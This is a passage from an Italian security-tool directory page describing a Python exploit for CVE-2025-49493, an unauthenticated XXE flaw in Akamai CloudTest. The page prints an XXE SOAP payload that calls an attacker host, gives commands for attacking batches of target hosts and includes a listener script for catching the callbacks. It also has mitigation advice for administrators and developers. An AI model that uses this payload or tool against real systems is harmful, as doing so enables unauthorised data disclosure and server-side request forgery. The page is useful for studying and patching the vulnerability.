Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-49493 — Questo è un exploit basato su Python per CVE-2025-49493, che riguarda le versioni di Akamai CloudTest precedenti alla 60 2025.06.02 (12988). La vulnerabilità consente l'iniezione di XML External Entity (XXE) tramite l'endpoint del servizio SOAP. | Kitploit
Strumenti/GitHubGitHub/sh4den/cve-2025-49493
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubsh4den/cve-2025-49493

CVE-2025-49493

Questo è un exploit basato su Python per CVE-2025-49493, che riguarda le versioni di Akamai CloudTest precedenti alla 60 2025.06.02 (12988). La vulnerabilità consente l'iniezione di XML External Entity (XXE) tramite l'endpoint del servizio SOAP.

Vedi Repository
11 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit XXE di Akamai CloudTest (CVE-2025-49493)

Panoramica

Questo è un exploit basato su Python per CVE-2025-49493, che colpisce le versioni di Akamai CloudTest precedenti alla 60 2025.06.02 (12988). La vulnerabilità consente l'iniezione di XML External Entity (XXE) tramite l'endpoint del servizio SOAP.

Dettagli della vulnerabilità

  • ID CVE: CVE-2025-49493
  • Tipo di vulnerabilità: Iniezione XML External Entity (XXE)
  • Gravità: Critica (CVSS 9.1)
  • Software interessato: Akamai CloudTest
  • Versioni interessate: Precedenti alla 60 2025.06.02 (12988)
  • Vettore di attacco: Rete
  • Autenticazione richiesta: No

Dettagli tecnici

La vulnerabilità è presente nell'endpoint SOAP /concerto/services/RepositoryService dove l'input XML viene elaborato senza una corretta sanificazione delle entità esterne. Un attaccante può creare payload XML dannosi per innescare attacchi XXE, che potenzialmente possono portare a:

  • Divulgazione di informazioni
  • SSRF (Server-Side Request Forgery)
  • Denial of Service
  • Potenziale RCE in determinate configurazioni

Caratteristiche

  • Scoperta dei target: Identifica automaticamente le istanze Akamai CloudTest
  • Rilevamento di vulnerabilità: Verifica la presenza di endpoint e indicatori vulnerabili
  • Sfruttamento XXE: Invia richieste SOAP modificate con payload XXE
  • Target multipli: Supporta l'elaborazione batch da file di target
  • Registrazione dettagliata: Registrazione completa e colorata con timestamp
  • Gestione errori: Gestione robusta degli errori per problemi di rete

Installazione

Prerequisiti

  • Python 3.6 o superiore
  • Gestore di pacchetti pip

Dipendenze

Installa i pacchetti richiesti:

root@kitploit:~
pip install -r requirements.txt

Oppure installa manualmente:

root@kitploit:~
pip install requests urllib3 colored pyfiglet

Utilizzo

Utilizzo di base

root@kitploit:~
python main.py targets.txt xxe.attacker.com

Utilizzo avanzato

root@kitploit:~
# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com

Opzioni della riga di comando

root@kitploit:~
positional arguments:
  targets              Target file containing list of Akamai CloudTest hosts
  xxe_server          XXE server to capture requests (e.g., attacker.com or IP)

optional arguments:
  -h, --help          show this help message and exit
  --timeout TIMEOUT   Request timeout in seconds (default: 10)

Formato del file dei target

Crea un file targets.txt con un target per riga:

root@kitploit:~
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

Configurazione del server XXE

Opzione 1: Utilizzo di Burp Collaborator

  1. Apri Burp Suite Professional
  2. Vai su Burp > client Burp Collaborator
  3. Fai clic su "Copia negli appunti" per ottenere l'URL del tuo collaborator
  4. Usa questo URL come parametro xxe_server

Opzione 2: Utilizzo di Interactsh

  1. Installa interactsh: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. Esegui: interactsh-client
  3. Usa l'URL fornito come parametro xxe_server

Opzione 3: Server HTTP personalizzato

Configura un semplice server HTTP per catturare le richieste:

root@kitploit:~
# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

Flusso dell'exploit

  1. Validazione del target: Valida il formato dell'URL e l'accessibilità
  2. Rilevamento della vulnerabilità:
    • Verifica la presenza di indicatori CloudTest nella risposta
    • Verifica che l'endpoint del servizio SOAP esista
  3. Generazione del payload XXE: Crea una busta SOAP dannosa con XXE
  4. Sfruttamento: Invia una richiesta modificata all'endpoint vulnerabile
  5. Analisi dei risultati: Analizza la risposta per indicatori di successo

Struttura del payload XXE

L'exploit utilizza la seguente struttura del payload XXE:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

Mitigazione

Per gli amministratori

  1. Azioni immediate:

    • Aggiorna Akamai CloudTest alla versione 60 2025.06.02 o successiva
    • Monitora i log per attività sospette di elaborazione XML
    • Implementa la segmentazione della rete per limitare l'esposizione
  2. Soluzioni a lungo termine:

    • Disabilita l'elaborazione delle entità esterne XML nei parser XML
    • Implementa la validazione e la sanificazione degli input
    • Usa liste consentite per l'elaborazione XML
    • Valutazioni di sicurezza regolari

Per gli sviluppatori

  1. Elaborazione XML sicura:

    root@kitploit:~
    # Disable external entities in XML parsers
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False
    
  2. Validazione degli input:

    • Valida tutto l'input XML rispetto a schemi rigorosi
    • Sanifica i dati controllati dall'utente prima dell'elaborazione XML
    • Implementa una corretta gestione degli errori

Riferimenti

  • Ricerca originale di xbow
  • Changelog di Akamai CloudTest
  • Dettagli CVE-2025-49493
  • Prevenzione XXE di OWASP

Disclaimer legale

Questo strumento è fornito esclusivamente per scopi educativi e di test autorizzati. Gli utenti sono responsabili di assicurarsi di avere la dovuta autorizzazione prima di testare qualsiasi sistema. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.

Contributi

  1. Fai una fork del repository
  2. Crea un branch per la funzionalità
  3. Apporta le tue modifiche
  4. Aggiungi test se applicabile
  5. Invia una pull request

Licenza

Questo progetto è concesso in licenza secondo la Licenza MIT - consulta il file LICENSE per i dettagli.

Autori

  • Ricerca originale: xbow, 3th1c_yuk1
  • Sviluppo dell'exploit: Security Research Team
  • Assegnazione CVE: CVE-2025-49493

Registro delle modifiche

v1.0.0

  • Rilascio iniziale
  • Funzionalità di base dello sfruttamento XXE
  • Supporto per file di target
  • Registrazione completa
  • Miglioramenti nella gestione degli errori
Scarica lo strumento